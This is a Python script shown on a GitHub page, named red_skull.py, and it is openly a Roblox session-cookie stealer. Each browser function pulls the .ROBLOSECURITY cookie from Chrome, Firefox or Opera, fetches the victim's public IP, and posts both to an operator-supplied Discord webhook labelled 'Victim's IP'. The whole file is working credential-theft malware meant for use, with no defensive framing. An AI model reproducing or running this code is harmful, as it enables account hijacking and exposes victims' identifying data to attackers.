-
Notifications
You must be signed in to change notification settings - Fork 5
/
red_skull.py
111 lines (99 loc) · 4.17 KB
/
red_skull.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
import browser_cookie3
import requests
import threading
WebHook = "" # Input your webhook here
def MicrosoftEdge():
try:
cookies = browser_cookie3.chrome(domain_name = "roblox.com")
cookies = str(cookies)
cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
ip_address = requests.get("https://api.ipify.org/").text
requests.post(WebHook, json = {
"username" : "RED SKULL|COOK'ER",
"avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
"embeds": [{
"title": "COOKIE FOUND|Browser : Edge",
"description": f"```{cookie}```",
"color": 16711680,
"fields": [
{"name" : "Victim's IP", "value" : ip_address, "inline:": True}
],
"footer": {
"text": "Krn0s@github",
"icon_url": "https://avatars.githubusercontent.com/u/99499638?v=4"
}
}]})
except:
pass
def GoogleChrome():
try:
cookies = browser_cookie3.chrome(domain_name = "roblox.com")
cookies = str(cookies)
cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
ip_address = requests.get("https://api.ipify.org/").text
requests.post(WebHook, json = {
"username" : "RED SKULL|COOK'ER",
"avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
"embeds": [{
"title": "COOKIE FOUND|Browser : Chrome",
"description": f"```{cookie}```",
"color": 16711680,
"fields": [
{"name" : "Victim's IP", "value" : ip_address, "inline:": True}
],
"footer": {
"text": "Krn0s@github",
"icon_url": "https://avatars.githubusercontent.com/u/99499638?v=4"
}
}]})
except:
pass
def MozillaFirefox():
try:
cookies = browser_cookie3.firefox(domain_name = "roblox.com")
cookies = str(cookies)
cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
ip_address = requests.get("https://api.ipify.org/").text
requests.post(WebHook, json = {
"username" : "RED SKULL|COOK'ER",
"avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
"embeds": [{
"title": "COOKIE FOUND|Browser : Firefox",
"description": f"```{cookie}```",
"color": 16711680,
"fields": [
{"name" : "Victim's IP", "value" : ip_address, "inline:": True}
],
"footer": {
"text": "Krn0s@github",
"icon_url": "https://avatars.githubusercontent.com/u/99499638?v=4"
}
}]})
except:
pass
def Opera():
try:
cookies = browser_cookie3.opera(domain_name = "roblox.com")
cookies = str(cookies)
cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
ip_address = requests.get("https://api.ipify.org/").text
requests.post(WebHook, json = {
"username" : "RED SKULL|COOK'ER",
"avatar_url" : "https://cdn.discordapp.com/attachments/1071405002570092577/1072887295465771008/skull.png",
"embeds": [{
"title": "COOKIE FOUND|Browser : Opera",
"description": f"```{cookie}```",
"color": 16711680,
"fields": [
{"name" : "Victim's IP", "value" : ip_address, "inline:": True}
],
"footer": {
"text": "Krn0s@github",
"icon_url": "https://avatars.githubusercontent.com/u/99499638?v=4"
}
}]})
except:
pass
browsers = [MicrosoftEdge, GoogleChrome, MozillaFirefox, Opera]
for v in browsers:
threading.Thread(target = v).start()